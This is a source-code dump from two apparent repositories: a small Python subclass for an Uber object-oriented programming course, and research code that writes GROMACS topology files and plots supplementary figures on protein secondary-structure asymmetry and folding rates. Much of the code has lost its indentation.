{
"source": "jomilto/cursoPOOUber",
"score": 3
}
#### File: cursoPOOUber/Python/uberPool.py
```python
from car import Car
class UberPool(Car):
    brand: str
    model: str
    def __init__(self, license, driver, brand, model):
        super().__init__(license, driver)
        self.brand = brand
        self.model = model
```
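
A minimal usage sketch (not part of the repo): it assumes `car.py` defines `Car.__init__(self, license, driver)`, as the `super().__init__` call above implies.

```python
# Hypothetical example; Car is assumed to accept (license, driver).
pool_car = UberPool("ABC-123", "Jane Doe", "Toyota", "Prius")
print(pool_car.brand, pool_car.model)  # -> Toyota Prius
```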
{
"source": "jomimc/FoldAsymCode",
"score": 2
}
#### File: MD_simulations/Src/write_topology.py
```python
from itertools import product
import os
import sys
import numpy as np
from scipy.optimize import minimize
from scipy.spatial import distance_matrix
import read_gro
HEADER = """
; Topology file generated from Go-kit.\n
; https://github.org/gokit1/gokit/\n
[ defaults ]\n
; nbfunc comb-rule gen-pairs\n
1 1 no \n
\n
[ atomtypes ]\n
; name mass charge ptype c6 c12\n
CA 1.000 0.000 A 0.000000e+00 1.677722e-05 \n
\n
[ moleculetype ]\n
; name nrexcl\n
Macromolecule 3\n
\n
"""
def write_gro(f, atype, res, xyz, vel=(), header='Header'):
    # Format coordinates (and velocities, if given) as fixed-width columns;
    # the comprehension variable is named `pos` so it does not shadow the
    # `res` parameter used in the write loop below.
    if len(vel):
        xyz = [''.join([f"{round(x,3):8.3f}" for x in list(pos) + list(v)]) for pos, v in zip(xyz, vel)]
    else:
        xyz = [''.join([f"{round(x,3):8.3f}" for x in pos]) for pos in xyz]
idx = [str(i+1) for i in range(len(xyz))]
with open(f, 'w') as o:
o.write(f"{header}\n")
o.write(f"{len(idx)}\n")
for i, t, r, coords in zip(idx, atype, res, xyz):
o.write(f"{i:>5s}{r:<4s}{t:>6s}{i:>5s}{coords}\n")
o.write(" 50.0000"*3 + "\n")
def write_wall_tmp(f, xyz, start, head='Header'):
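    # Write wall beads in a gro-like fixed-width format: residue id + name,
    # atom type, atom index, then x/y/z; a 50.0 box-vector line is appended.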
t = 'CA'
idx = [str(i+start) for i in range(len(xyz))]
r = 'WALL'
with open(f, 'w') as o:
o.write(f"{head}\n")
for i, (x, y, z) in zip(idx, xyz):
o.write(f"{i+r:>8s}{t:>7s}{i:>5s}{round(x,3):8.3f}{round(y,3):8.3f}{round(z,3):8.3f}\n")
o.write(" 50.0000"*3 + "\n")
def write_general(f, lines, nl='\n'):
with open(f, 'w') as o:
for l in lines:
o.write(f"{l}{nl}")
def write_topology(ref_file, top_file, rest_p, N):
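    # Splice extra sections into a reference topology: position restraints for
    # the protein, plus a one-atom WALL molecule type with its own restraints.
    # The last 7 lines of the reference file are kept as the footer, to which
    # the 'WALL N' molecule count is appended.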
topology = [l for l in open(ref_file, 'r')]
start_top = ''.join(topology[:-7])
end_top = ''.join(topology[-7:])
# Add restraints to protein
rest_top1 = '[ position_restraints ]\n; ai funct fcx fcy fcz\n' + \
''.join([f"{i:>4d}{1:>6d}{1000:>7d}{1000:>7d}{1000:>7d}\n" for i in rest_p])
# Add wall molecules
mol_top = '[ moleculetype ]\n; name nrexcl\n WALL 3 \n'
atoms_top = '[ atoms ]\n;nr type resnr residue atom cgnr\n' + \
''.join([f"{i:>8d} CA 1 WALL CA{i:>8d}\n" for i in [1]])
rest_top2 = '[ position_restraints ]\n; ai funct fcx fcy fcz\n' + \
''.join([f"{i:>4d}{1:>6d}{1000:>7d}{1000:>7d}{1000:>7d}\n" for i in [1]])
end_top += f'WALL {N}\n'
topology_str = '\n'.join([start_top, rest_top1, mol_top, atoms_top, rest_top2, end_top])
with open(top_file, 'w') as o:
o.write(topology_str)
if __name__ == "__main__":
f = sys.argv[1]
N, box, atype, res, xyz, vel = read_gro.load_gro(f)
    # write_gro itself branches on whether velocities are present, so a
    # single call suffices (previously the no-velocity branch omitted the
    # required `vel` argument and raised a TypeError).
    write_gro('gromacs.gro', atype, res, xyz, vel)
```
#### File: FoldAsymCode/Src/si_figs.py
```python
from collections import defaultdict, Counter
from itertools import product, permutations
from glob import glob
import json
import os
from pathlib import Path
import pickle
import sqlite3
import string
import sys
import time
import matplotlib as mpl
from matplotlib import colors
from matplotlib import pyplot as plt
from matplotlib.gridspec import GridSpec
from matplotlib.lines import Line2D
import matplotlib.patches as mpatches
from multiprocessing import Pool
import numpy as np
import pandas as pd
from palettable.colorbrewer.qualitative import Paired_12
from palettable.colorbrewer.diverging import PuOr_5, RdYlGn_6, PuOr_10, RdBu_10
from palettable.scientific.diverging import Cork_10
from scipy.spatial import distance_matrix, ConvexHull, convex_hull_plot_2d
from scipy.stats import linregress, pearsonr, lognorm
import seaborn as sns
import svgutils.compose as sc
import asym_io
from asym_io import PATH_BASE, PATH_ASYM, PATH_ASYM_DATA
import asym_utils as utils
import folding_rate
import new_figs  # assumed sibling module: fig8a() below calls new_figs.generate_strand()
import paper_figs
import structure
PATH_FIG = PATH_ASYM.joinpath("Figures")
PATH_FIG_DATA = PATH_FIG.joinpath("Data")
custom_cmap = sns.diverging_palette(230, 22, s=100, l=47, n=13)
c_helix = custom_cmap[2]
c_sheet = custom_cmap[10]
col = [c_helix, c_sheet, "#CB7CE6", "#79C726"]
####################################################################
### SI Figures
####################################################################
### FIG 1
def fig1(df, nx=3, ny=3, N=50):
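    # SI Fig 1: per-SCOP-fold secondary-structure probability as a function of
    # sequence distance from the N terminus (solid) and C terminus (dotted).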
fig, ax = plt.subplots(nx,ny, figsize=(12,12))
ax = ax.reshape(ax.size)
fig.subplots_adjust(hspace=.5)
lbls = ['Helix', 'Sheet', 'Coil', 'Disorder']
cat = 'HS.D'
scop_desc = {row[1]:row[2] for row in pd.read_csv(PATH_BASE.joinpath('SCOP/scop-des-latest.txt')).itertuples()}
CF_count = sorted(df.CF.value_counts().items(), key=lambda x:x[1], reverse=True)[1:]
bold_idx = [0, 1, 2, 6, 8]
for i in range(nx*ny):
cf_id, count = CF_count[i]
countN, countC = utils.pdb_end_stats_disorder_N_C(df.loc[df.CF==cf_id], N=N, s1='SEQ_PDB2', s2='SS_PDB2')
base = np.zeros(len(countN['S']), dtype=float)
Yt = np.array([[sum(p.values()) for p in countN[s]] for s in cat]).sum(axis=0)
X = np.arange(base.size)
for j, s in enumerate(cat):
YN = np.array([sum(p.values()) for p in countN[s]])
YC = np.array([sum(p.values()) for p in countC[s]])
ax[i].plot(YN/Yt, '-', c=col[j], label=f"{s} N")
ax[i].plot(YC/Yt, ':', c=col[j], label=f"{s} C")
if i in bold_idx:
ax[i].set_title(f"{scop_desc[int(cf_id)][:40]}\nTotal sequences: {count}", fontweight='bold')
else:
ax[i].set_title(f"{scop_desc[int(cf_id)][:40]}\nTotal sequences: {count}")
ax[i].set_xlabel('Sequence distance from ends')
if not i%3:
ax[i].set_ylabel('Secondary\nstructure\nprobability')
handles = [Line2D([0], [0], ls=ls, c=c, label=l) for ls, c, l in zip(['-', '--'], ['k']*2, ['N', 'C'])] + \
[Line2D([0], [0], ls='-', c=c, label=l) for l, c in zip(lbls, col)]
ax[1].legend(handles=handles, bbox_to_anchor=(1.40, 1.45), frameon=False,
ncol=6, columnspacing=1.5, handlelength=2.0)
fig.savefig(PATH_FIG.joinpath("si1.pdf"), bbox_inches='tight')
####################################################################
### FIG 2
def fig2():
pfdb = asym_io.load_pfdb()
fig, ax = plt.subplots(1,2, figsize=(10,5))
fig.subplots_adjust(wspace=0.3)
X1 = np.log10(pfdb.loc[pfdb.use, 'L'])
X2 = np.log10(pfdb.loc[pfdb.use, 'CO'])
Y = pfdb.loc[pfdb.use, 'log_kf']
sns.regplot(X1, Y, ax=ax[0])
sns.regplot(X2, Y, ax=ax[1])
print(pearsonr(X1, Y))
print(pearsonr(X2, Y))
ax[0].set_ylabel(r'$\log_{10} k_f$')
ax[1].set_ylabel(r'$\log_{10} k_f$')
ax[0].set_xlabel(r'$\log_{10}$ Sequence Length')
ax[1].set_xlabel(r'$\log_{10}$ Contact Order')
fs = 14
for i, b in zip([0,1], list('ABCDEFGHI')):
ax[i].text( -0.10, 1.05, b, transform=ax[i].transAxes, fontsize=fs)
fig.savefig(PATH_FIG.joinpath("si2.pdf"), bbox_inches='tight')
####################################################################
### FIG 3
def fig3(pdb, Y='S_ASYM'):
LO = folding_rate.get_folding_translation_rates(pdb.copy(), which='lo')
HI = folding_rate.get_folding_translation_rates(pdb.copy(), which='hi')
fig, ax = plt.subplots()
lbls = ['Fit', r"$95\% CI$", r"$95\% CI$"]
for i, d in enumerate([pdb, LO, HI]):
print(f"{i}: frac R less than 0 = {utils.R_frac_1(d)}")
print(f"{i}: Euk frac (.1 < R < 10) = {utils.R_frac_2(d, k=5)}")
print(f"{i}: Prok frac (.1 < R < 10) = {utils.R_frac_2(d, k=10)}")
print(f"{i}: frac R faster than 'speed-limit' = {utils.R_frac_3(d)}")
print(f"{i}: frac R slower than 20 minutes = {utils.R_frac_4(d)}")
print()
sns.distplot(d['REL_RATE'], label=lbls[i], color=col[i])
ax.legend(loc='best', frameon=False)
ax.set_xlim(-6, 6)
ax.set_xlabel(r'$\log_{10}R$')
ax.set_ylabel('Density')
fig.savefig(PATH_FIG.joinpath("si3.pdf"), bbox_inches='tight')
####################################################################
### FIG 4
def fig4(pdb, Y='S_ASYM'):
LO = folding_rate.get_folding_translation_rates(pdb.copy(), which='lo')
HI = folding_rate.get_folding_translation_rates(pdb.copy(), which='hi')
# For the results using only 2-state proteins...
# HI = folding_rate.get_folding_translation_rates(pdb.copy(), which='best', only2s=True)
fig = plt.figure(figsize=(8,10.5))
gs = GridSpec(5,12, wspace=0.5, hspace=0.0, height_ratios=[1,0.5,1,0.5,1.5])
ax = [fig.add_subplot(gs[i*2,j*4:(j+1)*4]) for i in [0,1] for j in [0,1,2]] + \
[fig.add_subplot(gs[4,:5]), fig.add_subplot(gs[4,7:])]
X = np.arange(10)
width = .35
ttls = [r'$\alpha$ Helix', r'$\beta$ Sheet']
lbls = [r'$E_{\alpha}$', r'$E_{\beta}$']
custom_cmap = sns.diverging_palette(230, 22, s=100, l=47, n=13)
c_helix = custom_cmap[0]
c_sheet = custom_cmap[12]
col = [c_helix, c_sheet]
bins = np.linspace(-0.20, 0.20, 80)
width = np.diff(bins[:2])
X = bins[:-1] + width * 0.5
mid = 39
sep = 0.05
for k, pdb in enumerate([LO, HI]):
quantiles = pdb['REL_RATE'].quantile(np.arange(0,1.1,.1)).values
pdb['quant'] = pdb['REL_RATE'].apply(lambda x: utils.assign_quantile(x, quantiles))
enrich_data = pickle.load(open(PATH_FIG_DATA.joinpath("fig3_enrich.pickle"), 'rb'))
for i, Y in enumerate(['H_ASYM', 'S_ASYM']):
for j in range(len(quantiles)-1):
hist, bins = np.histogram(pdb.loc[pdb.quant==j, Y], bins=bins)
hist = hist / hist.sum()
if i:
ax[k*3+i].bar(X[:mid], (hist/hist.sum())[:mid], width, bottom=[sep*j]*mid, color='grey', alpha=.5)
ax[k*3+i].bar(X[-mid:], (hist/hist.sum())[-mid:], width, bottom=[sep*j]*mid, color=col[i], alpha=.5)
else:
ax[k*3+i].bar(X[:mid], (hist/hist.sum())[:mid], width, bottom=[sep*j]*mid, color=col[i], alpha=.5)
ax[k*3+i].bar(X[-mid:], (hist/hist.sum())[-mid:], width, bottom=[sep*j]*mid, color='grey', alpha=.5)
ax[k*3+i].plot(X[:mid], (hist/hist.sum()+sep*j)[:mid], '-', c='k', alpha=.5)
ax[k*3+i].plot(X[-mid:], (hist/hist.sum()+sep*j)[-mid:], '-', c='k', alpha=.5)
mean = np.mean(enrich_data[Y[0]], axis=0)
lo = np.abs(mean - np.quantile(enrich_data[Y[0]], 0.025, axis=0))
hi = np.abs(mean - np.quantile(enrich_data[Y[0]], 0.975, axis=0))
ax[k*3+2].barh([sep*j+(i+.7)*sep/3 for j in range(10)], mean, sep/3, xerr=(lo, hi), color=col[i], ec='k', alpha=.5, label=lbls[i], error_kw={'lw':.8})
ax[k*3+2].plot([0,0], [-0.05, 0.5], '-', c='k', lw=.1)
for i in [0,2]:
ax[k*3+i].set_yticks(np.arange(len(quantiles))*sep)
ax[k*3+i].set_yticklabels([round(x,1) for x in quantiles])
for i in range(2):
ax[k*3+i].spines['top'].set_visible(False)
ax[k*3+i].spines['right'].set_visible(False)
for i in range(1,3):
ax[k*3+i].spines['left'].set_visible(False)
ax[k*3+i].spines['top'].set_visible(False)
for i in range(3):
ax[k*3+i].set_ylim(0-sep/4, (0.5+sep/4)*1.05)
ax[k*3+1].set_yticks([])
ax[k*3+2].yaxis.set_label_position('right')
ax[k*3+2].yaxis.tick_right()
ax[k*3+0].set_xlabel(r"asym$_{\alpha}$")
ax[k*3+1].set_xlabel(r"asym$_{\beta}$")
ax[k*3+0].set_ylabel(r'$\log_{10}R$')
ax[k*3+2].set_xlabel('N terminal\nEnrichment')
plot_metric_space(fig, ax[6:])
fs = 14
for i, b in zip([0,3,6], list('ABCDEFGHI')):
ax[i].text( -0.20, 1.05, b, transform=ax[i].transAxes, fontsize=fs)
fig.savefig(PATH_FIG.joinpath("si4.pdf"), bbox_inches='tight')
def get_ci_index(X, Y):
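    # Return indices of points whose x and y both lie within the central 95%
    # (2.5th to 97.5th percentile) of their respective distributions.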
xlo = np.quantile(X, 0.025)
xhi = np.quantile(X, 0.975)
ylo = np.quantile(Y, 0.025)
yhi = np.quantile(Y, 0.975)
return np.where((X>=xlo)&(X<=xhi)&(Y>=ylo)&(Y<=yhi))[0]
def plot_hull(boot_fit, patt, ax='', c='k', lw=1):
idx = get_ci_index(*boot_fit[:,:2].T)
tmp = boot_fit[idx].copy()
hull = ConvexHull(np.array([boot_fit[idx,1], boot_fit[idx, 0]]).T)
for simplex in hull.simplices:
if not isinstance(ax, str):
ax.plot(tmp[simplex, 1], tmp[simplex, 0], patt, c=c, lw=lw)
else:
plt.plot(tmp[simplex, 1], tmp[simplex, 0], patt, c=c, lw=lw)
def plot_metric_space(fig, ax):
fit = pickle.load(open(PATH_FIG_DATA.joinpath("boot_fit_met.pickle"), 'rb'))['AA']
boot_fit = pickle.load(open(PATH_FIG_DATA.joinpath("boot_fit_param.pickle"), 'rb'))
boot_fit_0 = pickle.load(open(PATH_FIG_DATA.joinpath("boot_fit_param_useall.pickle"), 'rb'))
X, Y = np.meshgrid(fit["c1"], fit["c2"])
cmap = colors.ListedColormap(sns.diverging_palette(230, 22, s=100, l=47, n=8))
bounds = np.linspace(-2, 2, 9)
norm = colors.BoundaryNorm(bounds, cmap.N)
im = []
ttls = ['Helices', 'Sheets']
for i in range(2):
im = ax[i].contourf(X, Y, fit['met'][:,:,i], bounds, cmap=cmap, vmin=-2, vmax=2, norm=norm)
cbar = fig.colorbar(im, ax=ax[i], fraction=0.046, pad=0.04, norm=norm, boundaries=bounds, ticks=bounds)
cbar.set_label(r"$R_{\mathregular{max}}$", labelpad=-5)
ax[i].set_xlabel('A')
ax[i].set_xlim(X.min(), X.max())
ax[i].set_ylabel('B')
ax[i].set_ylim(Y.max(), Y.min())
ax[i].invert_yaxis()
ax[i].set_aspect((np.max(X)-np.min(X))/(np.max(Y)-np.min(Y)))
ax[i].set_title(ttls[i])
col = ['k', '#79C726']
for i, boofi in enumerate([boot_fit, boot_fit_0]):
for j in range(2):
for bf, p in zip(boofi, ['-', ':']):
plot_hull(bf, p, ax[j], c=col[i])
c1 = [13.77, -6.07]
c1a = [11.36553036, -4.87716477]
c1b = [16.17819934, -7.27168306]
patt = ['*', 'o', 'o']
lbls = ['Fit', r"$95\% CI$", r"$95\% CI$"]
col = "#CB7CE6"
for i in range(2):
for coef, p, l in zip([c1, c1a, c1b], patt, lbls):
ax[i].plot([coef[0]], [coef[1]], p, label=l, fillstyle='none', ms=10, c=col, mew=2)
ax[i].legend(loc='best', frameon=False)
####################################################################
### FIG 5
def fig5():
fig, ax = plt.subplots(2,1)
fig.subplots_adjust(hspace=0.3)
bins = np.arange(0,620,20)
X = [bins[:-1] + np.diff(bins[:2])]
bins = np.arange(0,61,2.0)
X.append(bins[:-1] + np.diff(bins[:2]))
yellows = sns.diverging_palette(5, 55, s=95, l=77, n=13)
pinks = sns.diverging_palette(5, 55, s=70, l=52, n=13)
col = [yellows[12], pinks[0]]
col2 = [yellows[10], pinks[3]]
data = [pickle.load(open(PATH_FIG_DATA.joinpath(f"dom_{x}_dist_boot.pickle"), 'rb')) for x in ['aa', 'smco']]
for j in range(2):
for i in [1,2]:
MEAN, LO, HI = [np.array(x) for x in data[j][f"pos{i}"]]
ax[j].plot(X[j], MEAN, '--', c=col[i-1], label=f'position {i}')
ax[j].fill_between(X[j], LO, HI, color=col2[i-1], alpha=0.5)
ax[0].set_xlabel('Sequence Length')
ax[1].set_xlabel('Contact Order')
ax[0].set_ylabel('Density')
ax[1].set_ylabel('Density')
ax[0].legend(loc='upper right', frameon=False)
fig.savefig(PATH_FIG.joinpath("si5.pdf"), bbox_inches='tight')
####################################################################
### FIG 6
def fig6(X='REL_RATE', Y='S_ASYM'):
fig, ax = plt.subplots(1,2, figsize=(10,4))
fig.subplots_adjust(hspace=0.7, wspace=0.3)
sep = 0.40
col = Paired_12.hex_colors[5]
ttls = [f"Position {i}" for i in range(1,3)]
dom_pos_boot = pickle.load(open(PATH_FIG_DATA.joinpath("dom_pos_boot.pickle"), 'rb'))
custom_cmap = sns.diverging_palette(230, 22, s=100, l=47, n=13)
c_helix = custom_cmap[2]
c_sheet = custom_cmap[11]
col = [c_helix, c_sheet, "#CB7CE6", "#79C726"]
# ttls = ["Two-domain", "Three-domain"]
xlbls = [r'$E_{\alpha}$', r'$E_{\beta}$']
for i in range(2):
for j, (pos, dat) in enumerate(dom_pos_boot[2].items()):
quantiles = dat[0].mean(axis=0)
mean = dat[1][:,i,:].mean(axis=0)
lo = np.abs(np.quantile(dat[1][:,i,:], 0.025, axis=0) - mean)
hi = np.abs(np.quantile(dat[1][:,i,:], 0.975, axis=0) - mean)
ax[j].bar(np.arange(10)+(i+1)*sep, mean, sep, yerr=(lo, hi), color=col[i], label=xlbls[i], alpha=0.7, error_kw={'lw':.8})
ax[j].set_xticks(np.arange(len(quantiles)))
ax[j].set_xticklabels(np.round(quantiles, 1), rotation=90)
ax[i].spines['top'].set_visible(False)
ax[i].spines['right'].set_visible(False)
ax[i].set_title(ttls[i], loc='left')
ax[i].set_xlabel(r'$\log_{10}R$')
# ax[i,k].set_ylabel('N terminal\nEnrichment')
ax[i].set_ylabel("N Terminal Enrichment")
ax[0].legend(bbox_to_anchor=(1.17, 1.12), frameon=False, ncol=3)
fig.savefig(PATH_FIG.joinpath("si6.pdf"), bbox_inches='tight')
####################################################################
### FIG 7
def fig7(pdb, Y='D_ASYM'):
fig, ax = plt.subplots(3,3, figsize=(12,8))
fig.subplots_adjust(hspace=0.5, wspace=0.5)
sep = 0.05
col = Paired_12.hex_colors[7]
xlbls = [r'$\log_{10} R$', 'Sequence Length', 'Contact Order']
ttls = ['Full sample', 'Eukaryotes', 'Prokaryotes']
for k, df in enumerate([pdb, pdb.loc[pdb.k_trans==5], pdb.loc[pdb.k_trans==10]]):
for i, X in enumerate(['REL_RATE', 'AA_PDB', 'CO']):
quantiles = df[X].quantile(np.arange(0,1.1,.1)).values
df['quant'] = df[X].apply(lambda x: utils.assign_quantile(x, quantiles))
ratio = []
for j in range(len(quantiles)-1):
left = len(df.loc[(df.quant==j)&(df[Y]<0)]) / max(1, len(df.loc[(df.quant==j)]))
right = len(df.loc[(df.quant==j)&(df[Y]>0)]) / max(1, len(df.loc[(df.quant==j)]))
ratio.append((right - left))
# print(ratio)
ax[i,k].bar([sep*j+sep/2 for j in range(10)], ratio, sep/2, color=[col if r > 0 else 'grey' for r in ratio], alpha=.5)
ax[i,k].set_xticks(np.arange(len(quantiles))*sep)
if i == 1:
ax[i,k].set_xticklabels([int(x) for x in quantiles], rotation=90)
else:
ax[i,k].set_xticklabels([round(x,1) for x in quantiles], rotation=90)
ax[i,k].set_xlabel(xlbls[i])
ax[i,k].set_ylabel('N terminal\nEnrichment')
ax[0,k].set_title(ttls[k])
fig.savefig(PATH_FIG.joinpath("si7.pdf"), bbox_inches='tight')
####################################################################
### FIG 8
def fig8(df_pdb):
fig = plt.figure()
gs = GridSpec(2,1, wspace=0.0, height_ratios=[.5,1])
ax = [fig.add_subplot(gs[1,0]), fig.add_subplot(gs[0,0])]
X = np.arange(-3, 3, 0.01)
Y = np.array([(10**x + 1)/max(10**x, 1) for x in X])
Y2 = (1+10**X) / np.array([max(1, 10**x+30./100.) for x in X])
ax[0].plot(X, Y, '-', label=r"$\tau_{ribo}=0$")
ax[0].plot(X, Y2, ':', label=r"$\tau_{ribo}=0.3\tau_{trans}$")
lbls = ['1ILO', '2OT2', '3BID']
patt = ['o', 's', '^']
for l, p in zip(lbls, patt):
X, Y = np.load(PATH_FIG_DATA.joinpath(f"{l}.npy"))
ax[0].plot(X, Y, p, label=l, alpha=0.5, mec='k', ms=7)
ax[0].set_xlim(-2.3, 2.3)
ax[0].set_ylim(1, 2.05)
ax[0].set_xlabel(r'$\log_{10} R$')
ax[0].set_ylabel("Speed-up")
ax[0].spines['top'].set_visible(False)
ax[0].spines['right'].set_visible(False)
ax[0].legend(loc='upper right', frameon=False, bbox_to_anchor=(1.05, 1.00), ncol=1, labelspacing=.1)
fig8a(df_pdb, ax[1])
fig.savefig(PATH_FIG.joinpath("si8.pdf"), bbox_inches='tight')
def fig8a(df_pdb, ax):
lbls = ['2OT2', '1ILO', '3BID']
idx = [98212, 19922, 127370]
SS = df_pdb.loc[idx, 'SS_PDB2'].values
custom_cmap = sns.diverging_palette(230, 22, s=100, l=47, n=13)
col_key = {'.':'grey', 'D':'grey', 'H':custom_cmap[3], 'S':custom_cmap[9]}
ec_key = {'.':'grey', 'D':'grey', 'H':custom_cmap[1], 'S':custom_cmap[11]}
wid_key = {'.':0.1, 'D':0.1, 'H':0.3, 'S':0.3}
lw_key = {'.':0.7, 'D':0.7, 'H':1.5, 'S':1.5}
for i, ss in enumerate(SS):
left = 0.
for j, strand in enumerate(new_figs.generate_strand(ss)):
s = strand[0]
ax.barh([i], [len(strand)], wid_key[s], left=[left], color=col_key[s], ec=ec_key[s], linewidth=lw_key[s])
left += len(strand) + 0.20
ax.annotate("N", xy=(-0.01, 1.0), xycoords='axes fraction')
ax.annotate("C", xy=(0.59, 1.0), xycoords='axes fraction')
for pos in ['left', 'right', 'top', 'bottom']:
ax.spines[pos].set_visible(False)
col = np.array(custom_cmap)[[3,9,1,11]]
ax.legend(handles=[mpatches.Patch(fc=c1, ec=c2, label=l) for c1, c2, l in zip(col[:2], col[2:], ['Helix', 'Sheet'])],
loc='upper right', frameon=False, ncol=1, bbox_to_anchor=(0.95, 1.10))
ax.set_xticks([])
ax.set_yticks(range(3))
ax.set_yticklabels(lbls)
ax.tick_params(axis='y', which='major', length=0, pad=10)
####################################################################
### FIG 9
def fig9(pdb, s='S'):
pdb = pdb.loc[(pdb.USE_RSA)]
pdb = pdb.loc[(pdb.SS_PDB2.str.len()==pdb.RSA.apply(len))]
path = PATH_FIG_DATA.joinpath("RSA_quantiles.pickle")
if path.exists():
quantiles, euk_quantiles, prok_quantiles = pickle.load(open(path, 'rb'))
else:
quantiles = [np.quantile([x for y in pdb['RSA'] for x in y if np.isfinite(x)], x/3) for x in range(1,4)]
euk_quantiles = [np.quantile([x for y in pdb.loc[pdb.k_trans==5, 'RSA'] for x in y if np.isfinite(x)], x/3) for x in range(1,4)]
prok_quantiles = [np.quantile([x for y in pdb.loc[pdb.k_trans==10, 'RSA'] for x in y if np.isfinite(x)], x/3) for x in range(1,4)]
pickle.dump([quantiles, euk_quantiles, prok_quantiles], open(path, 'wb'))
print(quantiles)
# fig, ax = plt.subplots(4,3, figsize=(8,8))
# fig.subplots_adjust(wspace=0.5)
fig = plt.figure(figsize=(12,9))
gs = GridSpec(5,3, wspace=0.3, height_ratios=[1,1,1,1,1])
ax = [fig.add_subplot(gs[j,i]) for i in range(3) for j in [0,1]] + \
[fig.add_subplot(gs[j,i]) for i in range(3) for j in [3,4]]
print("All proteins, all SS")
fig9a(pdb['RSA'], pdb['SS_PDB2'], quantiles, ax[:2], s='SH.D')
print("euk proteins, all ss")
fig9a(pdb.loc[pdb.k_trans==5, 'RSA'], pdb.loc[pdb.k_trans==5, 'SS_PDB2'], euk_quantiles, ax[2:4], s='SH.D')
print("Prok proteins, all SS")
fig9a(pdb.loc[pdb.k_trans==10, 'RSA'], pdb.loc[pdb.k_trans==10, 'SS_PDB2'], prok_quantiles, ax[4:6], s='SH.D')
print("Euk proteins, only SHC")
fig9a(pdb.loc[pdb.k_trans==5, 'RSA'], pdb.loc[pdb.k_trans==5, 'SS_PDB2'], euk_quantiles, ax[6:8], s='SH.')
print("Euk proteins, only S")
fig9a(pdb.loc[pdb.k_trans==5, 'RSA'], pdb.loc[pdb.k_trans==5, 'SS_PDB2'], euk_quantiles, ax[8:10], s='S')
print("Prok proteins, only S")
fig9a(pdb.loc[pdb.k_trans==10, 'RSA'], pdb.loc[pdb.k_trans==10, 'SS_PDB2'], prok_quantiles, ax[10:12], s='S')
ttls = ['All proteins\nAll residues', 'Eukaryotic proteins\nAll residues', 'Prokaryotic proteins\nAll residues',
'Eukaryotic proteins\nHelix, sheet and coil', 'Eukaryotic proteins\nOnly Sheets', 'Prokaryotic proteins\nOnly Sheets']
col = np.array(list(Paired_12.hex_colors))[[0,2,4,6]]
lbls = ['Buried', 'Middle', 'Exposed']
ax[0].set_ylabel('Solvent accessibility\nprobability')
ax[1].set_ylabel('Solvent accessibility\nasymmetry\n$\\log_2 (N / C)$')
ax[6].set_ylabel('Solvent accessibility\nprobability')
ax[7].set_ylabel('Solvent accessibility\nasymmetry\n$\\log_2 (N / C)$')
handles = [Line2D([0], [0], ls=ls, c=c, label=l) for ls, c, l in zip(['-', '--'], ['k']*2, ['N', 'C'])] + \
[Line2D([0], [0], ls='-', c=c, label=l) for l, c in zip(lbls, col)]
ax[8].legend(handles=handles, bbox_to_anchor=(1.30, 1.85), frameon=False,
ncol=5, columnspacing=1.5, handlelength=2.0, labelspacing=2.0)
for i, a in enumerate(ax):
if i % 2:
ax[i].set_xticks(range(0, 60, 10))
ax[i].set_xlabel('Sequence distance from ends')
else:
ax[i].set_xticks([])
ax[i].set_title(ttls[i//2])
ax[i].set_xlim(0, 50)
fig.savefig(PATH_FIG.joinpath("si9.pdf"), bbox_inches='tight')
def fig9a(rsa_list, ss_list, quantiles, ax, s='S'):
cat = 'BME'
countN, countC = utils.sheets_rsa_seq_dist(rsa_list, ss_list, quantiles, ss_key=s)
col = np.array(list(Paired_12.hex_colors))[[0,2,4,6]]
base = np.zeros(len(countN[cat[0]]), dtype=float)
YtN = np.array(list(countN.values())).sum(axis=0)
YtC = np.array(list(countC.values())).sum(axis=0)
X = np.arange(base.size)
for i, s in enumerate(cat):
YN = countN[s]
YC = countC[s]
ax[0].plot(YN/YtN, '-', c=col[i], label=f"{s} N")
ax[0].plot(YC/YtC, ':', c=col[i], label=f"{s} C")
ax[1].plot(np.log2(YN/YC*YtC/YtN), '-', c=col[i], label=f"{s}")
print(s, np.round((np.sum(YN[:20]) / np.sum(YtN[:20])) / (np.sum(YC[:20]) / np.sum(YtC[:20])), 2))
ax[1].plot([0]*base.size, ':', c='k')
ax[0].set_ylim(0,1)
ax[1].set_ylim(-1,1)
for a in ax:
a.set_xlim(X[0], X[-1])
####################################################################
### FIG 10
def fig10(pdb):
pfdb = asym_io.load_pfdb()
acpro = asym_io.load_acpro()
fig = plt.figure(figsize=(12,9))
gs = GridSpec(3,7, wspace=0.0, width_ratios=[5,0.2,5,0.4,3,1.0,6], height_ratios=[1,.3,1])
ax = [fig.add_subplot(gs[2,i*2]) for i in range(4)] + \
[fig.add_subplot(gs[0,0:3]), fig.add_subplot(gs[0,5:])]
# sns.distplot(pdb.ln_kf, ax=ax[5], label='PDB - PFDB fit', hist=False)
pdb = pdb.copy()
coef = folding_rate.linear_fit(np.log10(acpro['L']), acpro['log_kf']).params
pdb['ln_kf'] = folding_rate.pred_fold(np.log10(pdb.AA_PDB), coef)
pdb = utils.get_rel_rate(pdb)
fig10a(fig, ax[4])
fig10b(fig, ax[:4], pdb)
# sns.distplot(pdb.ln_kf, ax=ax[5], label='PDB - ACPro fit', hist=False)
# sns.distplot(pfdb.log_kf, ax=ax[5], label='PFDB data', kde=False, norm_hist=True)
# sns.distplot(acpro["ln kf"], ax=ax[5], label='KDB data', kde=False, norm_hist=True)
    sns.regplot(np.log10(acpro['L']), acpro['log_kf'], ax=ax[5], label='ACPro data', scatter_kws={"alpha":0.5})
    sns.regplot(np.log10(pfdb.loc[pfdb.use, 'L']), pfdb.loc[pfdb.use, 'log_kf'], ax=ax[5], label='PFDB data', scatter_kws={"alpha":0.5})
ax[5].legend(loc='best', frameon=False)
ax[5].set_xlabel(r"$\log_{10}L$")
ax[5].set_ylabel(r"$\log_{10}k_f$")
fs = 14
for i, b in zip([4,5,0,2,3], list('ABCDEFGHI')):
ax[i].text( -0.20, 1.16, b, transform=ax[i].transAxes, fontsize=fs)
fig.savefig(PATH_FIG.joinpath("si10.pdf"), bbox_inches='tight')
def fig10a(fig, ax):
Rdist_data = pickle.load(open(PATH_FIG_DATA.joinpath("R_dist_acpro.pickle"), 'rb'))
custom_cmap = sns.diverging_palette(230, 22, s=100, l=47, n=13)
c_helix = custom_cmap[2]
c_sheet = custom_cmap[10]
col = [c_helix, c_sheet, "#CB7CE6", "#79C726"]
lbls = ['All', 'Prokaryotes', 'Eukaryotes']
for i, k in enumerate(['All', 'Prok', 'Euk']):
ax.plot(Rdist_data['grid'], Rdist_data[k][0], '-', c=col[i], label=lbls[i])
